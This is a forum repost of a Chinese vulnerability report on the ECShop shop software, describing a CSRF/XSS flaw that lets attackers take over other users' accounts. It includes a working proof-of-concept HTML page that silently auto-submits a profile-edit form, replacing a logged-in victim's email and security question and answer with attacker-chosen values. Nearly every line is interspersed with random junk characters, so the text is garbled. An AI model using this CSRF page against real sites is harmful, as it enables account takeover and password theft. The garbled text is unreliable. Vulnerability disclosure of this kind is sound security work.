简要描述: a+ |6 u0 P& R8 A: Q
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
3 [0 s9 w; _( h
; @# Z9 S# d' X* v5 rDemo For:http://www.wooyun.org/bug.php?action=view&id=395
5 k7 l/ @8 O# q. ]" c0 S- F$ m& F2 k& R, s! E" D' M) x: }
详细说明:( V' W- G1 A/ R' M& J0 X
利用csrf和xss可以突破官方所说的“障碍”
7 c( Z, u0 g7 z4 Dxss版本已经有人说明
Y# r) b4 `' p5 f这里给出csrf版本5 P9 `& w3 m- c4 \. E- H
% N, G/ I6 Y7 f+ \; g6 S
漏洞证明:6 v1 y& p$ D& u4 G7 [" e5 t
<html>" X& J: f. s6 q, d# X
<body>
, u* U% H: M! f4 r7 ]- ^<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
, K1 P4 m2 i% r, Z! I4 }( B<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
# N, s, g' R: p/ |; E# W<INPUT TYPE="text" NAME="act" value="act_edit_profile">
. N6 @; O+ F, A+ t4 n' V& c3 i<INPUT TYPE="text" NAME="sel_question" value="ecshop">/ Z7 ^; Q# `- M4 `
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
, p4 S' v1 X/ q+ ?6 K- c& {</body>
0 Y( Y) l7 T7 O& _- q' {1 p, d% O<script>% Y. k& l1 x! s) P: P
document.forms[0].submit();5 S% V) L7 {: w+ p) Y$ {
</script>
2 ^* U1 W5 u) E$ W! m2 T</html># B/ X" K# u5 @$ e+ O9 W
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失# i4 W& p1 G- |, l' ?# E! e+ _
: U+ R) a$ E0 [4 s& j2 E' }
|
发表于 2013-2-20 08:30:14
收藏
支持
反对